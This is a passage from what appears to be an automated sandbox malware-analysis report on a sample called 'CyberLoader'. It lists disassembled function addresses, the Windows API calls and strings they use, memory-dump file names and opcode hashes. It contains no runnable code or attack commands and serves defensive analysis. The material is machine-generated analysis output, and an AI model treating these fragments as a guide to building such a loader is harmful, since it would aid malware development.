                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00289F8D
                                                    • Part of subcall function 0028A1E5: GetDC.USER32(00000000), ref: 0028A1EE
                                                    • Part of subcall function 0028A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0028A21D
                                                    • Part of subcall function 0028A1E5: ReleaseDC.USER32(00000000,?), ref: 0028A2B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ObjectRelease$CapsDevice
                                                  • String ID: (
                                                  • API String ID: 1061551593-3887548279
                                                  • Opcode ID: f74f483753b429c9a2fce2f04e98ae3b5c5b5f822e6ea4775c36b9a4ce2ca26c
                                                  • Instruction ID: b12da5eb51773ded7305919be384193cc9a000dea55ef1df22af1604652e751c
                                                  • Opcode Fuzzy Hash: f74f483753b429c9a2fce2f04e98ae3b5c5b5f822e6ea4775c36b9a4ce2ca26c
                                                  • Instruction Fuzzy Hash: 43812475618214AFD714DF28D848A2ABBE9FF89704F00491EF98AD7260CB71AD05CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00280E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _swprintf
                                                  • String ID: %ls$%s: %s
                                                  • API String ID: 589789837-2259941744
                                                  • Opcode ID: 4779cffc7d1f38f194bfdc6f653a4a59460589e3358d518f9089b02218c9752a
                                                  • Instruction ID: 613c35c864123d22cb4ca9270e1ec3ff93e49925f3ad3fdfaf9c834db1f05f09
                                                  • Opcode Fuzzy Hash: 4779cffc7d1f38f194bfdc6f653a4a59460589e3358d518f9089b02218c9752a
                                                  • Instruction Fuzzy Hash: D051E93D57E700FAFA713AA4CC83F377569AB25B01F208907B78A648D5CAE154746B12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00277730
                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002778CC
                                                    • Part of subcall function 0027A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A458
                                                    • Part of subcall function 0027A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A489
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$Attributes$H_prologTime
                                                  • String ID: :
                                                  • API String ID: 1861295151-336475711
                                                  • Opcode ID: 12c9b1d8781530a39cfbca15b5efa1da391545959446dfd16340f9608901841a
                                                  • Instruction ID: 1174070448f9cbbe4744b18f0a1ba9198939234cac5a6bc3fc28c08161f02c0a
                                                  • Opcode Fuzzy Hash: 12c9b1d8781530a39cfbca15b5efa1da391545959446dfd16340f9608901841a
                                                  • Instruction Fuzzy Hash: 5A419471815228AADB24EB50CD55EEEB37CAF45300F00C1DAB60DA3092EB745FA4DF62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UNC$\\?\
                                                  • API String ID: 0-253988292
                                                  • Opcode ID: abfefe7ee19cd63356d03dd184f061d7575eb3be6aa076a6662f2ab0a6840db0
                                                  • Instruction ID: 98dddf62a88072da84980c048ffd0970b5c1877a62c5fa5504a137abd1234fc3
                                                  • Opcode Fuzzy Hash: abfefe7ee19cd63356d03dd184f061d7575eb3be6aa076a6662f2ab0a6840db0
                                                  • Instruction Fuzzy Hash: D341943682021AABCF22AF21DC45FEFB7A9AF46750B10C065F81C97152DB70DA71CE60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00288FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Shell.Explorer$about:blank
                                                  • API String ID: 0-874089819
                                                  • Opcode ID: db05f38a236e65c092ab0955a93b81bbe899a9f3f081b01996b73907b4facfe4
                                                  • Instruction ID: f6418670cc93308589fdaf585698290d5bea3e09d7738462955f1a2538c58a09
                                                  • Opcode Fuzzy Hash: db05f38a236e65c092ab0955a93b81bbe899a9f3f081b01996b73907b4facfe4
                                                  • Instruction Fuzzy Hash: B8216F752252059FCB08EF64D895A3A77A8FF89711B18856DF9099B2C2DF70EC50CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DialogBoxParamW.USER32(GETPASSWORD1,00010464,0028A990,?,?), ref: 0028D4C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DialogParam
                                                  • String ID: GETPASSWORD1$xj,
                                                  • API String ID: 665744214-1809890633
                                                  • Opcode ID: dae130319eebc69f333c417e676e9c27a25d11f081864483171eb31fab50b18b
                                                  • Instruction ID: b55cbabe63b9969c55efe5d3b7d4cad592ef982514682e1a158f74eb9c94ebe3
                                                  • Opcode Fuzzy Hash: dae130319eebc69f333c417e676e9c27a25d11f081864483171eb31fab50b18b
                                                  • Instruction Fuzzy Hash: 86119E71630248ABDF22EE34AC06BEB33A8B70A351F144175FD09A71D1CAB0AC64C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027EB92
                                                    • Part of subcall function 0027EB73: GetProcAddress.KERNEL32(002B81C0,CryptUnprotectMemory), ref: 0027EBA2
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0027EBEC), ref: 0027EC84
                                                  Strings
                                                  • CryptProtectMemory failed, xrefs: 0027EC3B
                                                  • CryptUnprotectMemory failed, xrefs: 0027EC7C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CurrentProcess
                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                  • API String ID: 2190909847-396321323
                                                  • Opcode ID: 7585c9831b6ddbae0068576de6838a76c0ab4ca082837d84e07989dedb933d8b
                                                  • Instruction ID: bf98078fdee4fa390a58e27366072a651b19b8cf6545c3b8c42ac056175ce08c
                                                  • Opcode Fuzzy Hash: 7585c9831b6ddbae0068576de6838a76c0ab4ca082837d84e07989dedb933d8b
                                                  • Instruction Fuzzy Hash: 3D113A35A316256BDF169F24DD0AAAE3718EF09710B05C19EFC0D5F281CB719D618BE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00299B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: X*
                                                  • API String ID: 269201875-76513911
                                                  • Opcode ID: 6b9ce70a62a6e87625f1cdfd92b309df262751e9d952e631cc3bc99384026916
                                                  • Instruction ID: fdc4ec64d859f627df846a0cac004ac024ca9541d41dab6c5ec00aefbe65c571
                                                  • Opcode Fuzzy Hash: 6b9ce70a62a6e87625f1cdfd92b309df262751e9d952e631cc3bc99384026916
                                                  • Instruction Fuzzy Hash: CB11D671E222226BEF209F3CBC49B1633956F55734F05062BF921CA5D0E775DCB28A80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0028F25E
                                                  • ___raise_securityfailure.LIBCMT ref: 0028F345
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                  • String ID: 8-
                                                  • API String ID: 3761405300-625495810
                                                  • Opcode ID: 016013b7b769aef8611074ae48aab00d2a94e3c44280c77b364740c2ffa4a2f8
                                                  • Instruction ID: 5f1029f5833f03bc67e8f9d7994642335fbdafa259eb16a6e47e6f67e7ff39a0
                                                  • Opcode Fuzzy Hash: 016013b7b769aef8611074ae48aab00d2a94e3c44280c77b364740c2ffa4a2f8
                                                  • Instruction Fuzzy Hash: 772100B99222048BD754EF64F9C9B047BA5FB4D310F20582BE9088B3B0E3B0AD91CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00280889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32 ref: 002808AD
                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 002808F4
                                                    • Part of subcall function 00276E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276EAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                  • String ID: CreateThread failed
                                                  • API String ID: 2655393344-3849766595
                                                  • Opcode ID: 9d9311ef98ae32791b8610bd1d212cc705ab7bbafb7bffc1fc99833d5f4aa779
                                                  • Instruction ID: c56e6fb6367a95310ccaf618066ee8bda8888eabd0b346a05e94f9ee295994eb
                                                  • Opcode Fuzzy Hash: 9d9311ef98ae32791b8610bd1d212cc705ab7bbafb7bffc1fc99833d5f4aa779
                                                  • Instruction Fuzzy Hash: 9101D6B93653066FE630BF54ECC6FAA7398EB41751F10002DF98A521C1CEB1A8A49B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00298FA5: GetLastError.KERNEL32(?,002B0EE8,00293E14,002B0EE8,?,?,00293713,00000050,?,002B0EE8,00000200), ref: 00298FA9
                                                    • Part of subcall function 00298FA5: _free.LIBCMT ref: 00298FDC
                                                    • Part of subcall function 00298FA5: SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 0029901D
                                                    • Part of subcall function 00298FA5: _abort.LIBCMT ref: 00299023
                                                  • _abort.LIBCMT ref: 0029B2E0
                                                  • _free.LIBCMT ref: 0029B314
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_abort_free
                                                  • String ID: *
                                                  • API String ID: 289325740-3442289017
                                                  • Opcode ID: ee2ab5be65776dbf3483f126632499af8dd8d7b72e99f0fc5f7daaf63d37caec
                                                  • Instruction ID: 4a6c2de45fe7aaae52bcf04e46d18f7c914d036989f600a298d2dc3329abb1f4
                                                  • Opcode Fuzzy Hash: ee2ab5be65776dbf3483f126632499af8dd8d7b72e99f0fc5f7daaf63d37caec
                                                  • Instruction Fuzzy Hash: 20019635D31A26DFCF26EF59A90125DB364FF05721B1A054AE82467681CF306D62CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027DA98: _swprintf.LIBCMT ref: 0027DABE
                                                    • Part of subcall function 0027DA98: _strlen.LIBCMT ref: 0027DADF
                                                    • Part of subcall function 0027DA98: SetDlgItemTextW.USER32(?,002AE154,?), ref: 0027DB3F
                                                    • Part of subcall function 0027DA98: GetWindowRect.USER32(?,?), ref: 0027DB79
                                                    • Part of subcall function 0027DA98: GetClientRect.USER32(?,?), ref: 0027DB85
                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                  • SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                  • String ID: 0
                                                  • API String ID: 2622349952-4108050209
                                                  • Opcode ID: dec7590dd7c7b5e3510fdd9c347d3f42368381b5f7a650db643d173c4c509f79
                                                  • Instruction ID: 263f753a0dd60b97906706ac830f811240c2741a566cbe08f950149b317c05eb
                                                  • Opcode Fuzzy Hash: dec7590dd7c7b5e3510fdd9c347d3f42368381b5f7a650db643d173c4c509f79
                                                  • Instruction Fuzzy Hash: 04F0FF3042024EA7CF260F288C4DBEA3BA8BF21745F08C084FD5D404A1C774C8B5EB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00280A78,?), ref: 00280854
                                                  • GetLastError.KERNEL32(?), ref: 00280860
                                                    • Part of subcall function 00276E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276EAF
                                                  Strings
                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00280869
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                  • API String ID: 1091760877-2248577382
                                                  • Opcode ID: 3ea9a6c1a8a5f8ad01f006a8e0606c4bf53f6b9c3a14fc57e7d43c5dbbe7fe14
                                                  • Instruction ID: 209c970add33f01e89c2051a13ccd8b3f40402fc452cdc08a5b47796286f7ba8
                                                  • Opcode Fuzzy Hash: 3ea9a6c1a8a5f8ad01f006a8e0606c4bf53f6b9c3a14fc57e7d43c5dbbe7fe14
                                                  • Instruction Fuzzy Hash: AFD05E35A285212BCA113724AC0EEEF79059F53770F204714F63D651F5DF3149B18AE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,0027D32F,?), ref: 0027DA53
                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0027D32F,?), ref: 0027DA61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FindHandleModuleResource
                                                  • String ID: RTL
                                                  • API String ID: 3537982541-834975271
                                                  • Opcode ID: 55184c005a7f0cc0b480b054b1124f97b414928a3452e8df2f7d4c668ff26c66
                                                  • Instruction ID: 27edd2351e3531b2e668df0b8c27b00d6e18d8ba65462fb0b2e7e1dcc3055a2e
                                                  • Opcode Fuzzy Hash: 55184c005a7f0cc0b480b054b1124f97b414928a3452e8df2f7d4c668ff26c66
                                                  • Instruction Fuzzy Hash: 58C01232299352B7EB30AB307C0EB837A586B12B12F09048CB245DA2D0DEE5CA4087A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Function 00007FFD9BAE58C0 Relevance: 1.4, Instructions: 1446COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464585b6baf3f83de2ac7e2bf410076f0bfc64deb086edce30836c1087f9129
                                                  • Instruction ID: 618a0927720a94d4fd59fe3a79f9af7552330ddf6a856c9ccfb7cc114ae6438f
                                                  • Opcode Fuzzy Hash: 4464585b6baf3f83de2ac7e2bf410076f0bfc64deb086edce30836c1087f9129
                                                  • Instruction Fuzzy Hash: 58C2CE70A1961D8FDBA8EB58C899BA8B3F1FF58305F5141E9D00DD72A5CA74AE81CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BB0428E Relevance: 1.1, Instructions: 1064COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38a08af5f15f151a218e9476ec1f5fc4d78ec3b1ee8a2146da2586877741702d
